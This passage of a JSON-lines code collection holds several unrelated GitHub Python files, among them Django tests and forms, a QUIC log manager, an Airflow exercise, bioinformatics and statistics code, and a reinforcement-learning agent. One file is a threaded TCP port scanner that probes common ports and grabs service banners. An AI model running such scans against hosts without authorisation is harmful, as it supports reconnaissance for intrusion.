p3.reorder_quantity = 30\n dList = ['Holy sheet music', 'From Beethoven to T-swizzle']\n p3.descriptionList = json.dumps(dList)\n iList = ['/static/homepage/media/img/sh1.jpg', '/static/homepage/media/img/sh2.jpg', '/static/homepage/media/img/sh3.png']\n p3.imgList = json.dumps(iList)\n p3.save()\n\n p4 = cmod.Product.objects.get(id=p3.id)\n self.assertEquals(p4.name, 'Sheet Music 1')\n self.assertEquals(p4.category, cat4)\n self.assertEquals(p4.price, Decimal('9.50'))\n self.assertEquals(p4.descriptionList, json.dumps(dList))\n self.assertEquals(p4.imgList, json.dumps(iList))\n self.assertEquals(p4.quantity, 20)\n self.assertEquals(p4.reorder_quantity, 30)\n self.assertEquals(p4.reorder_trigger, 5)\n\n # to Run\n # python3 manage.py test catalog/tests/ test_product\n\n\n","repo_name":"adamsonb12/fomo","sub_path":"fomo/catalog/tests/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33297075102","text":"import json, os, re\nimport subprocess\nfrom metriccalculator import MetricCalculator\n\nclass FileManager:\n \n def __init__(self):\n print(\"\")\n self.serverqlog = \"\"\n\n def addTestInfo(self, testlogdir: str, scenario: str, clientpars: str, serverpars: str, clientname: str, servername: str, simulation: str):\n regex = re.compile(\"^(?![cs][lv]_).+\\.qlog\")\n files = []\n # find qlog files\n for dirpath, dirnames, filenames in os.walk(testlogdir):\n for f in filenames:\n if regex.match(f):\n files.append(os.path.join(dirpath, f))\n\n for qlog in files:\n self.updateFile(\n qlog, \n scenario, \n simulation, \n clientpars, \n serverpars, \n clientname, \n servername,\n True if \"client\" in qlog or \"clnt\" in qlog else False\n )\n\n def updateFile(self, file: str, scenario: str, simulation: str, clparams: str, svparams: str, client: str, server: str, vantageclient: bool):\n newdata_file = {}\n commit = \"\"\n\n split_path = file.split(sep=\"/\")\n sep =\"/\"\n\n # read used version (commit) of client/server\n if vantageclient:\n split_path[len(split_path) - 1] = \"cl_commit.txt\"\n commitpath = sep.join(split_path)\n with open(commitpath, \"r\") as commitfile:\n commit = commitfile.read()\n os.remove(commitpath)\n else:\n split_path[len(split_path) - 1] = \"sv_commit.txt\"\n commitpath = sep.join(split_path)\n with open(commitpath, \"r\") as commitfile:\n commit = commitfile.read()\n os.remove(commitpath)\n\n commit = commit.replace('\\n', '')\n # create summary field for qlog\n newdata_file[\"summary\"] = {\n \"commit\": commit,\n \"simulation\": simulation,\n \"scenario\": scenario,\n \"client\": client,\n \"client_params\": clparams,\n \"server\": server,\n \"server_params\": svparams\n }\n # Load in qlog file\n with open(file, \"r\") as qlog_file:\n data = qlog_file.read().lstrip()\n try:\n data_file = json.loads(data)\n except json.JSONDecodeError as err:\n print(\"Parsing qlog file error: \" + err)\n return\n for key in data_file:\n if key != \"summary\":\n newdata_file[key] = data_file[key]\n\n # remove and replace qlog file with new name\n os.remove(file)\n newfilename = \"\"\n if vantageclient:\n newfilename = \"cl_\"\n else:\n newfilename = \"sv_\"\n newfilename += simulation + \"_\"\n newfilename += client + \"_\" + server + \".qlog\"\n\n split_path[len(split_path) - 1] = newfilename\n newpath = sep.join(split_path)\n\n if not vantageclient:\n self.serverqlog = newpath\n\n with open(newpath, \"w\") as qlog_file:\n json.dump(newdata_file, qlog_file)\n\n def pcaptojson(self, logdir: str, sim: str, met_calc: MetricCalculator, isquic: bool, run: int):\n # user wireshark docker image to convert pcap to json\n convertcmd = \"docker run --env SIM=\" + sim + \" -v \" + logdir + \":/logs:rw qtest-tshark\"\n r = subprocess.run(convertcmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n regex = re.compile(\"^(?![cs][lv]_).+\\.json\")\n jsonfiles = []\n # find converted pcap files\n for dirpath, dirnames, filenames in os.walk(logdir):\n for f in filenames:\n if regex.match(f):\n jsonfiles.append(os.path.join(dirpath, f))\n \n pcapfile = open(jsonfiles[0], 'r').read()\n decrypterrors = pcapfile.count(\"quic.decryption_failed\")\n\n # If too many decryption errors, re-run test\n if decrypterrors < 200:\n met_calc.calculateMetrics(logdir, jsonfiles, self.serverqlog, True, isquic, sim, run)\n \n # remove converted pcap files\n for jsonfile in jsonfiles:\n os.remove(jsonfile) \n self.serverqlog = \"\"\n\n return (decrypterrors < 200)","repo_name":"moonfalir/quicSim-docker","sub_path":"qtest/filemanager.py","file_name":"filemanager.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"32558858517","text":"# Define a new pull_sales task\npull_sales = BashOperator(\n task_id='pullsales_task',\n bash_command='wget https://salestracking/latestinfo?json',\n dag=analytics_dag\n)\n\n# Set pull_sales to run prior to cleanup\npull_sales >> cleanup\n\n# Configure consolidate to run after cleanup\ncleanup >> consolidate\n\n# Set push_data to run last\nconsolidate >> push_data","repo_name":"skupriienko/Datacamp-Python-Exercises","sub_path":"Data-Engenering/Introduction to Airflow in Python/Implementing Airflow DAGs/4_Define order of BashOperators.py","file_name":"4_Define order of BashOperators.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"86"} +{"seq_id":"70779693086","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import get_user_model\n\n\nUser = get_user_model()\n\n\nclass CreationForm(UserCreationForm): \n class Meta(UserCreationForm.Meta):\n model = User \n fields = ('first_name', 'last_name', 'username', 'email') \n \n def clean(self):\n cleaned_data = super().clean()\n if User.objects.filter(email=cleaned_data.get('email')).exists():\n self.add_error('email', \"Эта почта уже зарегестрированна\")\n return cleaned_data","repo_name":"Denis-Guselnikov/account_wallet","sub_path":"wallet/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"8639308521","text":"import os\nfrom socket import *\nfrom threading import *\nfrom colorama import Fore\nscreenLock = Semaphore(value=1)\ndef connScan(tgtHost,tgtPort):\n try:\n conn=socket(AF_INET,SOCK_STREAM)\n conn.connect((tgtHost,tgtPort))\n conn.send('hello world\\r\\n'.encode(\"utf-8\")) #发送测试信息给端口\n results=conn.recv(100) #接收主机返回的信息\n screenLock.acquire() #加锁\n print(Fore.GREEN+'[OPEN]{0}/tcp '.format(tgtPort)+Fore.WHITE+results.decode(\"utf-8\"))\n conn.close()\n except Exception:\n screenLock.acquire()\n #print(e)\n #print(Fore.WHITE+'[CLOSE]%d/tcp'% tgtPort)\n finally:\n screenLock.release() #释放锁\n conn.close()\ndef portScan(tgtHost,tgtPorts):\n print(Fore.BLUE+\"[LOAD]正在解析IP\",end=\" \")\n try:\n tgtIP=gethostbyname(tgtHost) ##获得对应主机的ip地址\n print(Fore.WHITE+'')\n except Exception as e:\n print(Fore.RED+\"[ERROR]不能解析%s的IP {0}\".format(e) %tgtHost)\n \n try:\n Name=gethostbyaddr(tgtIP) ##获得ip对应主机的信息\n print (Fore.YELLOW+\"\\n[INFO]主机信息:\"+Name[0])\n except:\n print (Fore.YELLOW+\"\\n[INFO]主机IP\"+tgtIP)\n\n setdefaulttimeout(1)\n for Port in tgtPorts:\n t = Thread(target=connScan,args=(tgtHost,int(Port)))\n t.start()\n return\n \ndef main(Host,Ports):\n portScan(Host,Ports)\nif __name__=='__main__':\n if os.name == 'nt':\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n print(Fore.LIGHTCYAN_EX+\"_______________|_____________>..]>\"\n \"\\n|liuyyds私藏端口扫描器v1.0(Beta)||>>> - · · >\"\n \"\\n|Author:liusuxy|___________/-->.>->\"\n \"\\n|##|->| || |_||| || || ||\")\n tgt_host = str(input(Fore.LIGHTMAGENTA_EX+\"|URL of target|->\"))\n #ip_list = str(input(Fore.LIGHTMAGENTA_EX+\"|Port(s) of list|->\")).split(\",\")\n #################################################\n ip_list = [80,443,22,21,4444] #这里设置端口扫描列表\n #################################################\n main(tgt_host,ip_list)\n \n","repo_name":"liusuxyds/MyPortScanner","sub_path":"MyPortScanner1.0(Beta).py","file_name":"MyPortScanner1.0(Beta).py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74577069083","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import linalg as LA\nimport sys #for path to external scripts\nsys.path.insert(0,'/sdcard/FWC/module-1/trunk/matrices/CoordGeo') #path to my scripts\n#local imports\nfrom line.funcs import *\nfrom triangle.funcs import *\nfrom conics.funcs import circ_gen \nimport subprocess \nimport shlex\n\n#Input parameters\nA=np.array([2,1])\nb=4.5\nc=-6\nM=np.array(([1,-1]))\no=0\ne1=np.array(([1,0]))\nO=np.array([0,0])\nP = np.array([1.5,1.5])\nQ = np.array([-2,-2])\n\nD=abs(b/c)\nprint(\"ratio=\",D)\nomat=np.array(([0,1],[-1,0]))\n\n#Direction vectors\nm1=omat@A\nm2=omat@A\nm3=omat@M\n\n#Points on the lines\nx1=b/(A@e1)\nA1=x1*e1\nx2=c/(A@e1)\nA2=x2*e1\nx3=o/(M@e1)\nB1=x3*e1\n\n#Generating all lines\nk1=-2\nk2=2\n\nx_AB = line_dir_pt(m1,A1,k1,k2)\nx_CD = line_dir_pt(m2,A2,k1,k2)\nx_EF = line_dir_pt(m3,B1,k1,k2)\n\n#Plotting line\nplt.plot(x_AB[0,:],x_AB[1,:])\nplt.plot(x_CD[0,:],x_CD[1,:])\nplt.plot(x_EF[0,:],x_EF[1,:])\n\n#Labelling the coordinates \ntri_coords = np.vstack((O,P,Q)).T\n\n#tri_coords=x.T\n\nplt.scatter(tri_coords[0,:], tri_coords[1,:])\nvert_labels = ['O','P','Q'] \nfor i, txt in enumerate(vert_labels):\n plt.annotate(txt,\n (tri_coords[0,i],tri_coords[1,i]),\n textcoords=\"offset points\",\n xytext=(0,10),\n ha='center')\n\nplt.xlabel('$x$')\nplt.ylabel('$y$')\n\nplt.grid()\nplt.axis('equal')\n\n#for termux\nplt.savefig('/sdcard/FWC/module-1/trunk/matrices/line_assignment/line.pdf')\n#subprocess.run(shlex.split(\"termux-open /sdcard/fwc/Divya/line.pdf\"))\n#else\n#plt.show()\n","repo_name":"DivyaSai9621/FWC","sub_path":"line_assignment/assign.py","file_name":"assign.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13899167741","text":"true = 0\ncounter = 232500000\n\nwhile counter < 232800000:\n for i in range(2, 19):\n #not divisible by 1-20? try next\n if (counter % i != 0):\n break\n #fully divisible? show number\n if i == 19:\n true = 1\n print(counter)\n break\n counter += 1","repo_name":"volkerha/DT211-3-Cloud","sub_path":"euler/e5.py","file_name":"e5.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24872772623","text":"#!/usr/bin/env python\nimport numpy as np\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.cluster import AffinityPropagation\n\n\ndef distance_weighted_ave(x, dist):\n dm = dist.mean()\n i = dm[dm < 5e5].index\n dist = dist.loc[i, i]\n w = np.exp(- (dist / dist.mean().mean()) ** 2).replace(1, 0)\n d, w = x.align(w, axis=1, level='station')\n w.fillna(0, inplace=True)\n n = d.std()\n d = (d - d.mean()) / n\n v = d.fillna(0).dot(w.T) / d.notnull().astype(float).dot(w.T)\n return v.mul(n, axis=1, level='station')\n\nclass Blocks(object):\n def __init__(self, cluster_obj, **kwargs):\n \"\"\"\n Example usage:\n B = Blocks(DecisionTreeClassifier, min_samples_leaf = 1000)\n B = Blocks(AffinityPropagation)\n B = Blocks(AffinityPropagation, preference = -4)\n\n B.compute(x)\n B.regress(y)\n \"\"\"\n self.cl = cluster_obj(**kwargs)\n\n @staticmethod\n def indexer(notnull):\n d = {}\n for i, r in enumerate(notnull):\n try:\n d[tuple(r)].append(i)\n except KeyError:\n d[tuple(r)] = [i]\n return d\n\n def compute(self, x):\n self.X = x\n n = x.notnull().astype(int)\n if isinstance(self.cl, DecisionTreeClassifier):\n t = np.array(x.index, dtype='datetime64[m]', ndmin=2).astype(float).T\n self.dict = self.indexer(n.apply(lambda c: self.cl.fit(t, c).predict(t), 0).values)\n else:\n k, v = zip(*self.indexer(n.values).items())\n self.z = zip(v, self.cl.fit_predict(k))\n self.dict = {}\n for i, j in self.z:\n J = tuple(self.cl.cluster_centers_[j, :])\n try:\n self.dict[J].extend(i)\n except KeyError:\n self.dict[J] = i\n self.blocks = [x.iloc[i, np.array(c, dtype=bool)].dropna(1, 'all')\n for c, i in self.dict.items()]\n\n def check(self):\n \"\"\"Returns a pandas.DataFrame of same shape as original data, with clustered 1-0 arrangement corresponding to original missing value matrix.\"\"\"\n b = pd.DataFrame(columns = self.X.columns)\n for k, v in self.dict.items():\n J = np.array(k, ndmin=2).repeat(len(v), 0)\n b = b.append(pd.DataFrame(J, columns=self.X.columns, index=self.X.index[v]))\n return b\n\n def regression(self, x, y):\n x0 = x.fillna(0)\n x0[1] = 1\n b = np.linalg.lstsq(x0, y.loc[x.index].values.flatten())[0]\n self.b.append(pd.Series(b[:-1], index=x.columns))\n self.c.append(len(x))\n return x0.dot(b.reshape((-1, 1)))\n\n def regress(self, y, x=None, blocks=True):\n y = y.dropna()\n if x is not None:\n self.compute(x.loc[y.index])\n self.b = []\n self.c = []\n if blocks:\n r = pd.concat([self.regression(b, y) for b in self.blocks]).sort_index()\n else:\n r = self.regression(pd.concat(self.blocks, 1).sort_index(), y)\n r = pd.DataFrame(r)\n if isinstance(y, pd.Series):\n r.columns = pd.MultiIndex.from_tuples([y.name], names = x.columns.names)\n else:\n r.columns = y.columns\n return r\n\n\nif __name__ == \"__main__\":\n import binning, data\n\n D = data.Data()\n D.open('r','s_raw.h5')\n X = binning.bin(D.r).xs('avg', 1, 'aggr')\n X = X - X.mean()\n\n y = X.xs('3', 1, 'station', False).iloc[:,0].dropna()\n x = X.drop(y.name, 1).loc[y.index]\n\n # b = tree_blocks(x)\n # a = block_predictors(x, b)\n # a0 = pd.concat(a, 1).fillna(0)\n # r1 = np.linalg.lstsq(a0, y)\n # r2 = pd.concat([regression(c, y) for c in a], 0).sort_index()\n # r3 = affinity_regression(x, y)\n","repo_name":"betaplane/cezanne","sub_path":"python/spatial_stats.py","file_name":"spatial_stats.py","file_ext":"py","file_size_in_byte":3767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"41616551077","text":"from django.db import migrations\n\nfrom dnsmasq.constants import (SETTING_SERVER_SERVICE_NAME,\n SETTING_SERVER_USE_SUDO)\n\n\ndef insert_configuration_settings(apps, schema_editor):\n \"\"\"\n Insert some configuration settings\n \"\"\"\n # Don't import the Configuration model directly as it may be a newer\n # version than this migration expects.\n Setting = apps.get_model('dnsmasq', 'Setting')\n # Create configuration settings for server\n Setting.objects.create(\n name=SETTING_SERVER_SERVICE_NAME,\n description='Server service name',\n value='dnsmasq',\n is_active=True)\n Setting.objects.create(\n name=SETTING_SERVER_USE_SUDO,\n description='Use sudo to operate with server services',\n value='0',\n is_active=True)\n\n\ndef delete_configuration_settings(apps, schema_editor):\n \"\"\"\n Delete the configuration settings\n \"\"\"\n # Don't import the Configuration model directly as it may be a newer\n # version than this migration expects.\n Setting = apps.get_model('dnsmasq', 'Setting')\n settings = Setting.objects\n queryset = (settings.filter(name=SETTING_SERVER_SERVICE_NAME) |\n settings.filter(name=SETTING_SERVER_USE_SUDO))\n queryset.delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('website', '0002_setting_default_export_configuration'),\n ]\n\n operations = [\n migrations.RunPython(code=insert_configuration_settings,\n reverse_code=delete_configuration_settings),\n ]\n","repo_name":"muflone/django-dnsmasq","sub_path":"website/migrations/0003_setting_server.py","file_name":"0003_setting_server.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7541169821","text":"__author__ = 'Charles Van Goethem and Frederic Escudie'\n__copyright__ = 'Copyright (C) 2018 IUCT-O'\n__license__ = 'GNU General Public License'\n__version__ = '2.0.0'\n__email__ = 'escudie.frederic@iuct-oncopole.fr'\n__status__ = 'prod'\n\nimport os\nfrom jflow.component import Component\nfrom jflow.abstraction import MultiMap\nfrom weaver.function import ShellFunction\nfrom anacore.bed import BEDIO\n\n\nclass BamAreasToFastq (Component):\n\n def define_parameters(self, aln, targets, min_overlap=20, split_targets=False, R1=None, R2=None):\n # Parameters\n self.add_parameter(\"min_overlap\", \"A reads pair is selected only if this number of nucleotides of the target are covered by the each read.\", default=min_overlap, type=int)\n self.add_parameter(\"split_targets\", 'With this parameter each region has his own pair of outputted fastq.', default=split_targets, type=bool)\n\n # Input Files\n self.add_input_file_list(\"aln\", \"Pathes to alignment files (format: BAM).\", default=aln, required=True)\n self.add_input_file_list(\"R1\", \"The path to the inputted reads file (format: fastq).\", default=R1)\n self.add_input_file_list(\"R2\", \"The path to the inputted reads file (format: fastq).\", default=R2)\n self.add_input_file(\"targets\", \"The locations of areas to extract (format: BED). The position of the interests areas are extracted from column 7 (thickStart) and column 8 (thickEnd) if they exist otherwise they are extracted from column 2 (Start) and column 3 (End).\", default=targets, required=True)\n if len(self.R1) != len(self.R2):\n raise Exception(\"R1 and R2 list must have the same length.\")\n if not self.split_targets:\n self.repeated_targets = [self.targets for elt in self.aln]\n else:\n self.splitted_targets = self.get_splitted_pathes()\n self.repeated_aln = list()\n self.repeated_R1 = list()\n self.repeated_R2 = list()\n self.repeated_targets = list()\n for curr_idx, curr_aln in enumerate(self.aln):\n for curr_split in self.splitted_targets:\n self.repeated_aln.append(curr_aln)\n self.repeated_targets.append(curr_split)\n if len(self.R1) > 0 and len(self.R2) > 0:\n self.repeated_R1.append(self.R1[curr_idx])\n self.repeated_R2.append(self.R2[curr_idx])\n\n # Output Files\n if not self.split_targets:\n self.add_output_file_list(\"out_R1\", \"Pathes to the outputted R1 file (format: fastq).\", pattern='{basename_woext}_R1.fastq.gz', items=self.aln)\n self.add_output_file_list(\"out_R2\", \"Pathes to the outputted R2 file (format: fastq).\", pattern='{basename_woext}_R2.fastq.gz', items=self.aln)\n self.add_output_file_list(\"stderr\", \"Pathes to the stderr files (format: txt).\", pattern='{basename_woext}.stderr', items=self.aln)\n else:\n splitted_prefixes = self.get_splitted_prefixes()\n self.add_output_file_list(\"out_R1\", \"Pathes to the outputted R1 file (format: fastq).\", pattern='{basename_woext}_R1.fastq.gz', items=splitted_prefixes)\n self.add_output_file_list(\"out_R2\", \"Pathes to the outputted R2 file (format: fastq).\", pattern='{basename_woext}_R2.fastq.gz', items=splitted_prefixes)\n self.add_output_file_list(\"stderr\", \"Pathes to the stderr files (format: txt).\", pattern='{basename_woext}.stderr', items=splitted_prefixes)\n\n\n def get_splitted_prefixes(self):\n prefixes = list()\n targets_name = self.get_targets_name()\n for curr_aln in self.aln:\n if curr_aln.endswith(\".gz\") or curr_aln.endswith(\".bz\"):\n curr_aln = curr_aln[:-3]\n curr_aln = os.path.splitext(os.path.basename(curr_aln))[0]\n for curr_name in targets_name:\n prefixes.append(curr_aln + \"_\" + curr_name)\n return prefixes\n\n\n def get_targets_name(self):\n names = list()\n with BEDIO(self.targets) as FH_in:\n for curr_area in FH_in:\n names.append(curr_area.name)\n uniq_names = set([elt for elt in names if elt is not None])\n if len(names) != len(uniq_names):\n raise Exception('With option \"split_targets\" all the regions in {} must have an uniq name.'.format(self.targets))\n return names\n\n\n def process_split_targets(self):\n with BEDIO(self.targets) as FH_in:\n for curr_area in FH_in:\n curr_out = os.path.join(self.output_directory, curr_area.name.replace(\" \", \"_\") + \".bed\")\n nb_col = 4 if curr_area.thickStart is None or curr_area.thickEnd is None else 8 # 8 for amplicons with ZOI\n with BEDIO(curr_out, \"w\", write_nb_col=nb_col) as FH_out:\n FH_out.write(curr_area)\n\n\n def get_splitted_pathes(self):\n splitted_pathes = list()\n with BEDIO(self.targets) as FH_in:\n for curr_area in FH_in:\n curr_path = os.path.join(self.output_directory, curr_area.name.replace(\" \", \"_\") + \".bed\")\n splitted_pathes.append(curr_path)\n return splitted_pathes\n\n\n def process(self):\n if self.split_targets:\n self.process_split_targets()\n # Exec command\n cmd = self.get_exec_path(\"bamAreasToFastq.py\") + \\\n \" --min-overlap \" + str(self.min_overlap) + \\\n \" --input-targets $4\" + \\\n \" --input-aln $5\" + \\\n (\"\" if len(self.R1) == 0 else \" --input-R1 $6\") + \\\n (\"\" if len(self.R2) == 0 else \" --input-R2 $7\") + \\\n \" --output-R1 $1\" + \\\n \" --output-R2 $2\" + \\\n \" 2> $3\"\n bam2fastq_fct = ShellFunction(cmd, cmd_format='{EXE} {OUT} {IN}')\n inputs = [\n self.repeated_targets,\n (self.repeated_aln if self.split_targets else self.aln)\n ]\n if len(self.R1) > 0 and len(self.R2) > 0:\n inputs.extend([\n (self.repeated_R1 if self.split_targets else self.R1),\n (self.repeated_R2 if self.split_targets else self.R2)\n ])\n MultiMap(\n bam2fastq_fct,\n inputs=inputs,\n outputs=[self.out_R1, self.out_R2, self.stderr],\n )\n","repo_name":"bialimed/miams","sub_path":"jflow/workflows/components/bamAreasToFastq.py","file_name":"bamAreasToFastq.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"70389943643","text":"\"\"\"empty message\n\nRevision ID: bf3b526df736\nRevises: 54c5e3f77877\nCreate Date: 2019-10-27 16:32:16.882966\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'bf3b526df736'\ndown_revision = '54c5e3f77877'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('sanjiang',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('bookname', sa.String(length=140), nullable=True),\n sa.Column('href', sa.String(length=140), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('sanjiang')\n # ### end Alembic commands ###\n","repo_name":"bopopescu/my_anlewo","sub_path":"migrations/versions/bf3b526df736_.py","file_name":"bf3b526df736_.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9761213310","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\npath = './full_breast/'\nmask_path = path + 'mask/'\nprediction_path = path + 'pred/'\n\nfilenames = os.listdir(mask_path)\n\nfor img in filenames:\n\n mask = plt.imread(mask_path + img)\n prediction = plt.imread(prediction_path + img)\n\n #DEBUG\n print(mask.shape)\n print(prediction.shape)\n print('=================================')\n\ndef IOU(mask, prediction):\n mask_area = np.count_nonzero(mask == 1)\n prediction_area = np.count_nonzero(prediction == 1)\n\n intersection = np.count_nonzero(np.logical_and(mask, prediction))\n\n IoU = intersection / (mask_area + prediction_area - intersection)\n\n return IoU","repo_name":"Pooryamn/Breast-Tumor-Segmentation-and-Shape-Classification-in-Mammograms","sub_path":"SourceCodes/utils/Calculate_IOU.py","file_name":"Calculate_IOU.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"5258196406","text":"class Solution(object):\n def super_pow(self, a, b):\n if 1 == a:\n return 1\n n = int(''.join(map(str, b)))\n a %= 1337\n return self.get_power(a, n)\n\n def get_power(self, a, n):\n if 1 == n:\n return a % 1337\n m = n // 2\n ans_ = self.get_power(a, m)\n ans = ans_ * ans_\n if 1 == n % 2:\n ans *= a\n return ans % 1337\n","repo_name":"nkukarl/leetcode","sub_path":"super_pow.py","file_name":"super_pow.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"19180121876","text":"from __future__ import print_function\nimport numpy as np\nimport glob\n\n\ndef simple_acf(x, y):\n \"\"\"\n Calculate ACF of y.\n Returns period, acf_smooth, lags, rvar\n \"\"\"\n\n # interpolate across gaps\n gap_days = 0.02043365\n time = np.arange(x[0], x[-1], gap_days)\n lin_interp = np.interp(time, x, y)\n x, y = time, lin_interp\n\n # fit and subtract straight line\n AT = np.vstack((x, np.ones_like(x)))\n ATA = np.dot(AT, AT.T)\n m, b = np.linalg.solve(ATA, np.dot(AT, y))\n y -= m*x + b\n\n # perform acf\n acf = dan_acf(y)\n\n # create 'lags' array\n lags = np.arange(len(acf))*gap_days\n\n N = len(acf)\n double_acf, double_lags = [np.zeros((2*N)) for i in range(2)]\n double_acf[:N], double_lags[:N] = acf[::-1], -lags[::-1]\n double_acf[N:], double_lags[N:] = acf, lags\n acf, lags = double_acf, double_lags\n\n # smooth with Gaussian kernel convolution\n Gaussian = lambda x, sig: 1./(2*np.pi*sig**.5) * np.exp(-0.5*(x**2)/\n (sig**2))\n conv_func = Gaussian(np.arange(-28, 28, 1.), 9.)\n acf_smooth = np.convolve(acf, conv_func, mode='same')\n\n # just use the second bit (no reflection)\n acf_smooth, lags = acf_smooth[N:], lags[N:]\n\n # cut it in half (and reduce to 100 days)\n m = lags < max(lags)/2.\n m = (lags < max(lags)/2.) * (lags < 100)\n acf_smooth, lags = acf_smooth[m], lags[m]\n\n # ditch the first point\n acf_smooth, lags = acf_smooth[1:], lags[1:]\n\n # # fit and subtract straight line\n # AT = np.vstack((lags, np.ones_like(lags)))\n # ATA = np.dot(AT, AT.T)\n # m, b = np.linalg.solve(ATA, np.dot(AT, acf_smooth))\n # acf_smooth -= m*lags + b\n\n # Cut off the first half a day\n m = lags > .5\n acf_smooth, lags = acf_smooth[m], lags[m]\n\n # find all the peaks\n peaks = np.array([i for i in range(1, len(lags)-1)\n if acf_smooth[i-1] < acf_smooth[i] and\n acf_smooth[i+1] < acf_smooth[i]])\n\n # find the first and second peaks\n if len(peaks) > 1:\n if acf_smooth[peaks[0]] > acf_smooth[peaks[1]]:\n period = lags[peaks[0]]\n else:\n period = lags[peaks[1]]\n elif len(peaks) == 1:\n period = lags[peaks][0]\n elif not len(peaks):\n period = np.nan\n\n # find the highest peak\n if len(peaks):\n m = acf_smooth == max(acf_smooth[peaks])\n highest_peak = acf_smooth[m][0]\n period = lags[m][0]\n print(period)\n else:\n period = 0.\n\n rvar = np.percentile(y, 95)\n\n return period, acf_smooth, lags, rvar\n\n\ndef find_nearest(array, value):\n idx = (np.abs(array-value)).argmin()\n return array[idx]\n\n\n# dan's acf function\ndef dan_acf(x, axis=0, fast=False):\n \"\"\"\n Estimate the autocorrelation function of a time series using the FFT.\n :param x:\n The time series. If multidimensional, set the time axis using the\n ``axis`` keyword argument and the function will be computed for every\n other axis.\n :param axis: (optional)\n The time axis of ``x``. Assumed to be the first axis if not specified.\n :param fast: (optional)\n If ``True``, only use the largest ``2^n`` entries for efficiency.\n (default: False)\n \"\"\"\n x = np.atleast_1d(x)\n m = [slice(None), ] * len(x.shape)\n\n # For computational efficiency, crop the chain to the largest power of\n # two if requested.\n if fast:\n n = int(2**np.floor(np.log2(x.shape[axis])))\n m[axis] = slice(0, n)\n x = x\n else:\n n = x.shape[axis]\n\n # Compute the FFT and then (from that) the auto-correlation function.\n f = np.fft.fft(x-np.mean(x, axis=axis), n=2*n, axis=axis)\n m[axis] = slice(0, n)\n acf = np.fft.ifft(f * np.conjugate(f), axis=axis)[m].real\n m[axis] = 0\n return acf / acf[m]\n\n\nif __name__ == \"__main__\":\n\n DIR = \".\" # edit me!\n fnames = glob.glob(\"%s/*.dat\" % DIR)\n\n for i, fname in enumerate(fnames[1:]):\n id = fname.split(\"/\")[-1].split(\"_\")[0] # edit me!\n x, y, _, _ = np.genfromtxt(fname, skip_header=1).T\n yerr = np.ones_like(y) * 1e-5 # FIXME\n\n period, acf, lags = simple_acf(x, y)\n make_plot(acf, lags, id)\n","repo_name":"RuthAngus/GProtation","sub_path":"gprotation/simple_acf.py","file_name":"simple_acf.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"86"} +{"seq_id":"16761569892","text":"'''\nNouredine Nour (LaChancla sur codalab)\nTP4 Direct Policy Search\n'''\n\nimport numpy as np\nfrom environment import Environment\nimport cma\n\"\"\"\nContains the definition of the agent that will run in an\nenvironment.\n\"\"\"\n\nclass Patrick:\n\n def __init__(self):\n \"\"\"\n Init a new agent.\n \"\"\"\n\n # Discretizing position and velocity :\n self.positions = np.linspace(start=-1.2, stop=0.6, num=6)\n self.velocities = np.linspace(start=-0.07, stop=0.07, num=20)\n\n # Here we initialize the policy with a previous solution\n self.policy = np.array([list([1., 0., 2., 2., 0., 2., 2., 2., 0., 2., 1., 1., 0., 2., 1., 1., 0.,\n 1., 2., 2.]), list([2., 2., 2., 1., 2., 0., 1., 0., 0., 0., 2., 2., 1., 2., 2., 2., 1.,\n 0., 2., 1.]), list([0., 2., 2., 0., 0., 0., 0., 1., 1., 2., 2., 2., 2., 1., 2., 0., 2.,\n 0., 1., 2.]), list([0., 2., 0., 2., 1., 0., 0., 0., 1., 0., 1., 2., 2., 2., 2., 2., 2.,\n 2., 0., 0.]), list([1., 2., 1., 1., 0., 2., 2., 2., 0., 2., 2., 0., 2., 2., 2., 2., 2.,\n 2., 1., 1.]), 